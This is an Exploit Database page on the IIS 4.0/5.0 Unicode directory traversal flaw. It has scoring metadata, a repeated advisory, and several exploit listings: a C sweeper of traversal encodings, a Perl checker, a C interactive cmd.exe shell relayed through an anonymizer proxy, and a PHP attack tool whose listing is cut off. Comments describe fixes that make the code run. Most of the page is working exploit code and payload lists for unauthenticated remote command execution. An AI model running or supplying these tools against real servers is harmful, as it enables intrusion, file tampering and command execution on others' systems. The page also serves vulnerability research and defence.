Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.
Exploit information
Exploit Database EDB-ID : 20298
Publication date : 2000-10-16 22h00 +00:00
Author : Gabriel Maggiotti
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/1806/info
Microsoft IIS 4.0 and 5.0 are both vulnerable to double-dot ("../") directory traversal if overlong UTF-8 ("extended UNICODE") encodings are substituted for "/" and "\" — for example %c0%af for "/" and %c1%9c for "\" in the listings below. IIS rejected a literal ".." that escaped the web root but decoded these sequences only afterwards, so the traversal was never seen by the check. Note that several of the listings below also mix in double-URL-encoded forms such as %255c, %252f, %%35c and %25%35%63; those exercise the separate, later "superfluous decoding" flaw in IIS rather than the Unicode one, and a host patched against one may still answer to the other.
Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever.
It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001)
This is the vulnerability exploited by the Code Blue Worm.
**UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>
#define SEND 100000
#define RECIVE 1000000
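/*
 * Replace the first occurrence of `orig` in `string` with `rep`, in place.
 *
 * Returns `string`.  When `orig` does not occur the buffer is left untouched;
 * the original version dereferenced the NULL returned by strstr() in that case
 * (undefined behaviour) and also copied the whole string through a second
 * SEND-byte stack buffer.  The rewrite shifts the tail with memmove() instead,
 * so no temporary buffer is needed and nothing is copied that was not there.
 *
 * Precondition: the caller's buffer must have room for
 *   strlen(string) - strlen(orig) + strlen(rep) + 1
 * bytes.  The only caller passes send_buf (SEND bytes) and checks the length
 * before calling, so the bound is its responsibility.
 */
char *str_replace(char *rep, char *orig, char *string)
{
    size_t orig_len = strlen(orig);
    size_t rep_len = strlen(rep);
    char *pt = strstr(string, orig);

    if (pt == NULL)
        return string;

    /* Move the tail (including its NUL) so the replacement fits exactly,
     * then drop the replacement into the gap. */
    memmove(pt + rep_len, pt + orig_len, strlen(pt + orig_len) + 1);
    memcpy(pt, rep, rep_len);
    return string;
}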
/***************************************************************************/
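/*
 * Entry point.  usage: <hostname> <port> <commands>
 *
 * Sweeps every (virtual directory, traversal encoding) pair in path[] x uni[]:
 * the "#uni" marker in the path is swapped for the encoding, argv[3] (the
 * command, already '+'-separated by the user) is appended, and
 * "GET <path> HTTP/1.0" is sent to <hostname>:<port>.  Each request is made
 * in a forked child that prints the request and the full reply; the parent
 * paces the sweep (one request per second, a three-second pause every 200)
 * and reaps finished children.
 *
 * Fixes relative to the original listing:
 *  - path[] was indexed with `i`, which was never initialised (undefined
 *    behaviour; the outer loop variable `x` was unused) -- now path[x].
 *  - the request line was "HTTP/ 1.0\n\n" (malformed); now "HTTP/1.0\r\n\r\n",
 *    as in the Perl checker further down this page.
 *  - send() transmitted the whole SEND-byte buffer rather than the request.
 *  - recv_buf[numbytes] = '\0' wrote one past the end when a chunk filled the
 *    buffer; the reply is now read to EOF into at most sizeof recv_buf - 1.
 *  - the fork() test was inverted: the parent made the request and exit()ed
 *    while the child carried on looping.  Now the child makes the request.
 *  - the port is parsed with strtol() and range-checked instead of atoi().
 *  - the request is built with snprintf() and skipped if it would not leave
 *    room for the traversal string that str_replace() splices in.
 */
int main(int argc, char *argv[])
{
    /* Encodings substituted for "#uni".  %c0%af / %c1%9c / %c1%1c are
     * overlong UTF-8 for '/' and '\'; the %25.. / %%35.. / %5c forms are
     * (double) URL-encodings and exercise the separate double-decoding bug
     * rather than the Unicode one.  Entries like %c0%9v are malformed on
     * purpose. */
    char *uni[] = {
        "..%c0%af..",
        "..%c0%af../..%c0%af../..%c0%af..",
        "..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..",
        "..%c1%1c..",
        "..%c1%1c../..%c1%1c../..%c1%1c..",
        "..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..",
        "..%252f..",
        "..%252f../..%252f../..%252f..",
        "..%252f..%252f..%252f..%252f..%252f..",
        "..%252e..",
        ".%252e..",
        "..%252e../..%252e../..%252e..",
        "..%252e..%252e..%252e..%252e..%252e..",
        "..%c0%9v..",
        "..%c0%9v../..%c0%9v../..%c0%9v..",
        "..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..",
        "..%c0%qf..",
        "..%c0%qf../..%c0%qf../..%c0%qf..",
        "..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..",
        "..%c1%8s..",
        "..%c1%8s../..%c1%8s../..%c1%8s..",
        "..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..",
        "..%c1%9c..",
        "..%c1%9c../..%c1%9c../..%c1%9c..",
        "..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..",
        "..%c1%pc..",
        "..%c1%pc../..%c1%pc../..%c1%pc..",
        "..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..",
        "..%255c..",
        "..%255c../..%255c../..%255c..",
        "..%255c..%255c..%255c..%255c..%255c..",
        "..%5c..",
        "..%5c../..%5c../..%5c..",
        "..%5c..%5c..%5c..%5c..%5c..",
        "..%%35c..",
        "..%%35c../..%%35c../..%%35c..",
        "..%%35c../..%%35c../..%%35c", /* "last news": newest variant in the original; no trailing ".." */
        "..%%35c..%%35c..%%35c..%%35c..%%35c..",
        "..%%35%63..",
        "..%%35%63../..%%35%63../..%%35%63..",
        "..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..",
        "..%25%35%63..",
        "..%25%35%63../..%25%35%63../..%25%35%63..",
        "..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63.."
    };
    /* Virtual directories found on a default IIS 4/5 install; "#uni" is
     * replaced by one of the encodings above. */
    char *path[] = {
        "/scripts/#uni/winnt/system32/cmd.exe?/c+",
        "/scripts/#uniwinnt/system32/cmd.exe?/c+",
        "/msadc/#uni/winnt/system32/cmd.exe?/c+",
        "/cgi-bin/#uni/winnt/system32/cmd.exe?/c+",
        "/samples/#uni/winnt/system32/cmd.exe?/c+",
        "/iisadmpwd/#uni/winnt/system32/cmd.exe?/c+",
        "/_vti_cnf/#uni/winnt/system32/cmd.exe?/c+",
        "/_vti_bin/#uni/winnt/system32/cmd.exe?/c+",
        "/exchange/#uni/winnt/system32/cmd.exe?/c+",
        "/pbserver/#uni/winnt/system32/cmd.exe?/c+",
        "/adsamples/#uni/winnt/system32/cmd.exe?/c+"
    };
    int uni_len = sizeof(uni) / sizeof(uni[0]);
    int path_len = sizeof(path) / sizeof(path[0]);
    char send_buf[SEND];
    static char recv_buf[RECIVE];   /* ~1 MiB: static keeps it off the stack */
    struct hostent *he;
    struct sockaddr_in their_addr;
    long port;
    char *end;
    int cont = 0;
    int x, j;

    if (argc != 4) {
        fprintf(stderr, "usage:%s <hostname> <port> <commands>\n", argv[0]);
        exit(1);
    }
    if ((he = gethostbyname(argv[1])) == NULL) {
        /* gethostbyname() reports through h_errno, not errno, so perror()
         * would print an unrelated message. */
        fprintf(stderr, "gethostbyname: cannot resolve %s\n", argv[1]);
        exit(1);
    }
    errno = 0;
    port = strtol(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || errno == ERANGE || port < 1 || port > 65535) {
        fprintf(stderr, "bad port: %s\n", argv[2]);
        exit(1);
    }

    /* The peer address never changes; build it once. */
    memset(&their_addr, 0, sizeof their_addr);
    their_addr.sin_family = AF_INET;
    their_addr.sin_port = htons((unsigned short)port);
    memcpy(&their_addr.sin_addr, he->h_addr, sizeof their_addr.sin_addr);

    for (x = 0; x < path_len; x++) {
        for (j = 0; j < uni_len; j++) {
            pid_t pid;
            int n;

            n = snprintf(send_buf, sizeof send_buf, "GET %s%s HTTP/1.0\r\n\r\n",
                         path[x], argv[3]);
            /* str_replace() grows the request by strlen(uni[j]) - 4; make
             * sure that still fits before splicing the encoding in. */
            if (n < 0 || (size_t)n + strlen(uni[j]) >= sizeof send_buf) {
                fprintf(stderr, "request too long, skipping %s\n", path[x]);
                continue;
            }
            str_replace(uni[j], "#uni", send_buf);

            /* Pace the sweep: one request per second, a longer pause every 200. */
            if (cont == 200) {
                sleep(3);
                cont = 0;
            }
            cont++;
            sleep(1);

            pid = fork();
            if (pid == -1) {
                perror("fork");
                exit(1);
            }
            if (pid == 0) {
                /* Child: one connection, one request, print the reply, exit. */
                int sockfd;
                size_t total = 0;
                ssize_t got = 0;

                if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                    perror("socket");
                    exit(1);
                }
                if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof their_addr) == -1) {
                    perror("connect");
                    exit(1);
                }
                if (send(sockfd, send_buf, strlen(send_buf), 0) == -1) {
                    perror("send");
                    exit(1);
                }
                /* Read until the server closes or the buffer is full,
                 * always leaving one byte for the terminating NUL. */
                while (total < sizeof recv_buf - 1 &&
                       (got = recv(sockfd, recv_buf + total,
                                   sizeof recv_buf - 1 - total, 0)) > 0)
                    total += (size_t)got;
                if (got == -1) {
                    perror("recv");
                    exit(1);
                }
                recv_buf[total] = '\0';
                printf("\n-----------------------------------------------\n");
                printf("String: %s\n\n", send_buf);
                printf("%s\n------------bytes recived: %zu------------------\n",
                       recv_buf, total);
                close(sockfd);
                exit(0);
            }
            /* Parent: reap whatever has already finished, keep sweeping. */
            while (waitpid(-1, NULL, WNOHANG) > 0)
                ;
        }
    }
    /* Let the stragglers finish so their output lands before "Done...". */
    while (waitpid(-1, NULL, 0) > 0)
        ;
    printf("Done...\n");
    return 0;
}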
Exploit Database EDB-ID : 20299
Publication date : 2000-10-20 22h00 +00:00
Author : Roelof Temmingh
EDB Verified : Yes
source: https://www.securityfocus.com/bid/1806/info
Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\".
Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever.
It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001)
This is the vulnerability exploited by the Code Blue Worm.
**UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability.
#!/usr/bin/perl
# Very simple PERL script to test a machine for Unicode vulnerability.
# Use port number with SSLproxy for testing SSL sites
# Usage: unicodecheck IP:port
# Only makes use of "Socket" library
# Roelof Temmingh 2000/10/21
#
[email protected] http://www.sensepost.com
use Socket;
# --------------init
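# --------------init
# Fixes relative to the original listing:
#  - "@ARGV[0]" was a one-element array slice (works by accident, warns under
#    -w); it is now "$ARGV[0]", and a missing or non-numeric port falls back
#    to 80 instead of producing an empty $port.
#  - inet_aton() returning undef (unresolvable host) is now fatal instead of
#    being packed into the address later.
#  - the probe command was written "dir+c:\ " -- in a double-quoted string
#    "\ " is just a space, so what was actually sent was "dir+c: ".  The
#    backslash is now escaped so "dir c:\" is what reaches cmd.exe.
#  - the match was /Directory/, which an IIS "Directory Listing Denied" error
#    page also satisfies; it now needs the "Directory of" header or a "<DIR>"
#    entry that only a real listing produces.
if ($#ARGV < 0) { die "Usage: unicodecheck IP:port\n"; }
($host, $port) = split(/:/, $ARGV[0], 2);
$port = 80 unless defined $port && $port =~ /^\d+$/;
print "Testing $host:$port : ";
$target = inet_aton($host) or die "\nCannot resolve $host\n";
$flag = 0;
# --------------- probes: overlong UTF-8 for "/" (%c0%af) and "\" (%c1%9c)
my @probes = (
    "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\",
    "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\\",
);
foreach my $probe (@probes) {
    my @results = sendraw("GET $probe HTTP/1.0\r\n\r\n");
    $flag = 1 if grep { /Directory of|<DIR>/ } @results;
    last if $flag;    # one positive is enough; do not hit the host again
}
# ---------------result
if ($flag == 1) { print "Vulnerable\n"; }
else { print "Safe\n"; }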
# ------------- Sendraw - thanx RFP
[email protected]
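# Connect to $target:$port (package globals set above), send $pstr verbatim
# and return the whole reply as a list of lines.  Dies if the socket cannot
# be created or the connect fails.
#
# Changes relative to the original: the address is built with Socket's
# sockaddr_in() instead of a hand-packed "SnA4x8" template (which hard-coded
# AF_INET as 2 and packed the family in native byte order), the filehandle is
# lexical instead of the global S, and STDOUT is restored with select() so a
# die() after the call still prints where the caller expects.
sub sendraw {
    my ($pstr) = @_;
    my $paddr = sockaddr_in($port, $target);
    socket(my $sock, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0)
        || die("Socket problems\n");
    connect($sock, $paddr) || die("Can't connect...\n");
    my $prev = select($sock); $| = 1; select($prev);   # unbuffer the socket only
    print $sock $pstr;
    my @in = <$sock>;            # read until the server closes
    close($sock);
    return @in;
}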
# Spidermark: sensepostdata
Exploit Database EDB-ID : 20300
Publication date : 2000-10-16 22h00 +00:00
Author : zipo
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/1806/info
Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\".
Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever.
It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001)
This is the vulnerability exploited by the Code Blue Worm.
**UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability.
/* hack IIS 4.0/5.0 with the useful UNICODE :) and have fun */
/* coded by zipo */
/* to compile: cc -o iisuni iisuni.c */
/* made for all the lame populus :) */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
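#define BUFF_LEN 6000
#define HTTP " HTTP/1.0\r\n\r\n"
#define GET "GET http://"
/* Third-party anonymising proxy that every request is relayed through.  It
 * sees the target name, the command and the full reply of every session. */
#define ANON "anon.free.anonymizer.com"
/* Traversal prefixes, one per menu entry in bad_params().  The archive had
 * line-wrapped BUG1_STR and BUG3_STR so that the macro expanded to nothing
 * and the string became a stray statement; they are rejoined here.
 * %c0%af and %c1%9c are overlong UTF-8 encodings of '/' and '\'. */
#define BUG1_STR "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"
#define BUG2_STR "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+"
#define BUG3_STR "/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"
/* Variant 4 adds no traversal: whatever is typed at the prompt is appended
 * straight after "GET http://<host>/" (presumably so the user can supply a
 * path of their own). */
#define BUG4_STR "/"
/* Port the ANON proxy is contacted on.  The target's own port is never
 * dialled directly; the proxy forwards the absolute-URI request. */
#define HTTP_PORT 80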
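int bad_params(char *prog_name);

/*
 * Interactive loop.  usage: <hostname> <number>
 *
 * Reads a DOS command from stdin, turns spaces into '+', builds
 * "GET http://<hostname><BUGn_STR><command> HTTP/1.0" (absolute-URI form, so
 * the ANON proxy forwards it to the target) and prints the raw reply.
 * "exit" quits, "clear" clears the terminal, "?" prints a one-line help.
 *
 * Fixes relative to the original listing:
 *  - bad_params() was called before any declaration (implicit declaration);
 *    a prototype now precedes main().
 *  - fgets() was unchecked: EOF on stdin re-sent the stale command forever,
 *    and an empty read made cmd[strlen(cmd)-1] index cmd[-1].
 *  - write() sent all BUFF_LEN bytes of the buffer, not the request.
 *  - read() was called once, its result ignored, and strlen() then ran on a
 *    buffer that was never NUL-terminated.  The reply is now read to EOF,
 *    bounded and terminated.
 *  - the proxy address is resolved once; h_addrtype/h_length are checked
 *    before the memcpy into the IPv4 sockaddr.
 *  - two printf() format strings had been split across lines by the archive
 *    and did not compile; they are rejoined.
 *
 * NOTE(review): every request -- target name, command and reply -- passes
 * through the third-party host ANON in clear text.  Treat that host as an
 * observer of the whole session.
 */
int main(int argc, char *argv[])
{
    struct sockaddr_in sin;
    struct hostent *he;
    const char *bug;
    char cmd[BUFF_LEN], recbuffer[BUFF_LEN], buffer[BUFF_LEN];
    char *end;
    long variant;
    int sck;

    if (argc < 3)
        bad_params(argv[0]);

    variant = strtol(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0')
        variant = 0;                 /* not a number: fall into "Number error" */
    switch (variant) {
    case 1:
        bug = BUG1_STR;
        break;
    case 2:
        bug = BUG2_STR;
        break;
    case 3:
        bug = BUG3_STR;
        break;
    case 4:
        bug = BUG4_STR;
        break;
    default:
        printf("Number error\n");
        exit(1);
    }

    /* Resolve the proxy once; it does not change between commands. */
    if ((he = gethostbyname(ANON)) == NULL) {
        herror("host error");
        exit(1);
    }
    if (he->h_addrtype != AF_INET || he->h_length != (int)sizeof sin.sin_addr) {
        fprintf(stderr, "%s did not resolve to an IPv4 address\n", ANON);
        exit(1);
    }
    memset(&sin, 0, sizeof sin);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(HTTP_PORT);
    memcpy(&sin.sin_addr, he->h_addr, sizeof sin.sin_addr);

    for (;;) {
        printf("bash# ");
        fflush(stdout);                       /* the prompt has no newline */
        if (fgets(cmd, sizeof cmd, stdin) == NULL)
            break;                            /* EOF or read error: same as "exit" */
        cmd[strcspn(cmd, "\n")] = '\0';

        if (strcmp(cmd, "exit") == 0)
            break;
        if (strcmp(cmd, "clear") == 0) {
            system("clear");                  /* fixed string, no user input */
            continue;
        }
        if (cmd[0] == '\0')
            continue;
        if (strcmp(cmd, "?") == 0) {
            printf("Just you need to type in the prompt the M$DOS command\n");
            printf("to exit type \"exit\" :)\n");
            continue;
        }

        /* Spaces in the DOS command become '+' in the query string. */
        for (char *p = cmd; *p != '\0'; p++)
            if (*p == 0x20)
                *p = 0x2b;

        int n = snprintf(buffer, sizeof buffer, "%s%s%s%s%s", GET, argv[1], bug, cmd, HTTP);
        if (n < 0 || (size_t)n >= sizeof buffer) {
            printf("command too long\n");
            continue;
        }

        if ((sck = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
            perror("socket() error");
            exit(1);
        }
        if (connect(sck, (struct sockaddr *)&sin, sizeof sin) < 0) {
            perror("connect() error");
            exit(1);
        }
        if (write(sck, buffer, (size_t)n) != (ssize_t)n) {
            perror("write() error");
            close(sck);
            continue;
        }

        /* Read the reply until the proxy closes, leaving room for the NUL. */
        size_t total = 0;
        ssize_t got = 0;
        while (total < sizeof recbuffer - 1 &&
               (got = read(sck, recbuffer + total, sizeof recbuffer - 1 - total)) > 0)
            total += (size_t)got;
        if (got < 0)
            perror("read() error");
        recbuffer[total] = '\0';
        /* The original always dropped the last byte (a trailing newline);
         * only do so when it really is one. */
        if (total > 0 && recbuffer[total - 1] == '\n')
            recbuffer[total - 1] = '\0';

        printf("\033[0;7m-------------------------------------Received--------------------"
               "---------------\n");
        printf("%s\n---------------------------------------Done---------------------------"
               "----------\n\033[7;0m", recbuffer);
        close(sck);
    }
    return 0;
}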
/* you miss a parameter :'-( */
/*
 * Print the usage banner and the four traversal-prefix variants, then exit(1).
 * Declared int for compatibility with the call in main(); it never returns.
 * prog_name: argv[0], shown in the usage line.
 */
int bad_params(char *prog_name)
{
    fprintf(stdout,
            "usage:\n\t%s <hostname> <number>\n"
            "-------------------------------------------------------\n"
            "<1> msadc\t<2> scripts\t<3> iisadmpwd\t<4> /\n"
            "-------------------------------------------------------\n",
            prog_name);
    exit(1);
}
/* EOF */
Exploit Database EDB-ID : 20301
Publication date : 2000-10-16 22h00 +00:00
Author : BoloTron
EDB Verified : Yes
source: https://www.securityfocus.com/bid/1806/info
Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\".
Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever.
It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001)
This is the vulnerability exploited by the Code Blue Worm.
**UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability.
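#!php -q
<?php
/*
 * UNICODE / double-decoding traversal checker for IIS 4.0/5.0 -- BoloTron.
 *
 *   -t <host>                        try every variant with "dir c:\" until one
 *   -t <host> -p <proxy:port>        answers with a directory listing
 *   <host> <command> <n>             run <command> through variant <n>
 *   -p <proxy:port> <host> <command> <n>
 *
 * Spaces in <command> are written as "_"; backslashes must be doubled.
 *
 * Changes relative to the original listing:
 *  - "<?" short open tag -> "<?php"; ereg()/ereg_replace(), removed in PHP 7,
 *    -> strpos()/str_replace().
 *  - the archive had wrapped the request strings as "GET\nhttp://..." and
 *    "GET\n/..."; a newline there splits the request line, so the request is
 *    rebuilt on one line and terminated with CRLF CRLF.
 *  - the variant number is checked against the table, the proxy spec is
 *    validated, the reply buffer is reset for every variant, and fclose() is
 *    no longer called on a handle that fsockopen() failed to open.
 *  - networking, argument parsing and the usage texts are factored into
 *    small functions; the table and the argv layout are unchanged.
 */

/* Traversal prefixes, each ending in "cmd.exe?/c+" so the command is appended
 * directly.  %c0%af / %c1%9c / %c1%1c are overlong UTF-8 for '/' and '\';
 * %255c, %252f, %%35c and %25%35%63 are double URL-encodings and exercise the
 * separate double-decoding bug rather than the Unicode one.  Order matters:
 * the index is the "variant number" the user passes back in attack mode. */
$vector_ataque = array(
    "/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+",
    "/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+",
    "/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+",
    "/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+",
    "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+",
    "/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+",
    "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+",
    "/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+",
    "/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+",
    "/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+",
    "/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+",
    "/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+",
    "/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+",
    "/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+",
    "/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+",
    "/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+",
    "/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+",
    "/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+",
    "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+",
    "/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+",
    "/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+",
    "/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+",
    "/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+",
    "/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+",
    "/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+",
    "/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+",
    "/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+",
    "/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+",
    "/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+",
    "/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+",
    "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+",
    "/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+",
    "/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+",
    "/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+",
    "/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+",
    "/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+",
    "/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+",
    "/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+",
    "/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+",
    "/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+",
    "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+",
    "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+",
    "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+",
    "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+",
    "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+",
    "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+",
    "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+",
    "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+",
    "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+",
    "/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+",
    "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+",
    "/scripts..%c1%9c../winnt/system32/cmd.exe?/c+",
    "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+",
    "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+",
    "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+",
    "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+",
    "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+",
    "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+",
    "/scripts/..%c1%af../winnt/system32/cmd.exe?/c+",
    "/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+",
    "/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+",
    "/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+",
    "/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+",
    "/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c+",
    "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+",
    "/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+",
    "/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+",
    "/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+",
    "/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+",
    "/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"
);

/* Print the English usage text ($prog is argv[0]). */
function usage_en($prog)
{
    echo "\n\n--------------------------------------------------------------------\n";
    echo "------------- (c) UNICODE exploit for IIS 5.0/4.0 by BoloTron ------\n";
    echo "--------------------------------------------------------------------\n\n";
    echo "Usage of the wicked device:\n";
    echo $prog . " -t www.victim.vic\n";
    echo $prog . " -t www.victim.vic -p proxy:port\n";
    echo $prog . " www.victim.vic comand variant_number\n";
    echo $prog . " -p proxy:port www.victim.vic comand variant_number\n";
    echo "Options:\n";
    echo "-t --> Test the vulnerability (Try known variants till find the good one)\n";
    echo "-p --> Attack through proxy\n";
    echo "\nUse Mode:\n1) Test the host and get the variants number in case vulnerability exists\n";
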